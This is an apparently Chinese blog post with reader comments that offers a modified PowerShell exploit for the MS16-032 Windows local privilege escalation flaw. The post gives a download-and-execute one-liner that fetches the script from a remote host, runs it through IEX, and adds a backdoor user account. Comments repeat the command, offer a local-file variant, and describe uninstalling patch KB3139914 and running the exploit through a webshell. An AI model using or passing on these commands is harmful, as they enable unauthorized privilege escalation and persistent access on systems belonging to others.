MS16-032 windows本地提权
in 工具收集 with 9 comments

MS16-032 windows本地提权

in 工具收集 with 9 comments

exploit-db的详情:
https://www.exploit-db.com/exploits/39574/

试用系统:
Tested on x32 Win7, x64 Win8, x64 2k12R2

提权powershell脚本:

Invoke-MS16-032.ps1

测试详情:

Privilege.gif

为了方便使用,对这个脚本进行了简单的修改,可以执行任意程序,并可以添加参数执行(全程无弹框)脚本地址为:
Invoke-MS16-032.ps1

使用方式如下:
添加用户:
demo.gif

运行某程序:
app.gif

远程加用户:
直接执行如下命令,可进行提权并添加用户:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

演示如下:
remote.gif

Responses
  1. miss

    c:\windows\system32\inetsrv>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg [email protected]# /add'"
    使用“1”个参数调用“DownloadString”时发生异常:“无法解析此远程名称: 'raw.gith
    ubusercontent.com'”
    所在位置 行:1 字符: 46
    + IEX (New-Object Net.WebClient).DownloadString

    Reply
    1. @miss

      @miss 需要联网的。 你可以先看看能不能直接访问到脚本。

      Reply
  2. 你好

    有exe的吗? ps在菜刀下执行失败

    Reply
  3. powershell -nop -ep bypass -File exp.ps1 -command "Invoke-MS16-032 -Application cmd.exe -commandline '/c net user xxxxx test123 /add'"
    远程执行 没问题 下载至本地执行失败

    Reply
  4. test

    执行的时候会出现异常...
    [!] No valid thread handles were captured, exiting!
    咋办?

    Reply
    1. test1
      @test

      是不是打过补丁了?
      我前面没注意在打过补丁的机器上测的也是这个错误,
      卸载kb3139914后测试成功

      Reply
  5. rgx

    Hi friends.
    I have error [!] No valid thread handles were captured, exiting! on windows server 2008 x64.
    Please write how get privilegize on this system ?

    Reply
  6. qrq

    楼主有没有测试在虚拟机里面运行

    Reply
  7. great post
    赞!

    Reply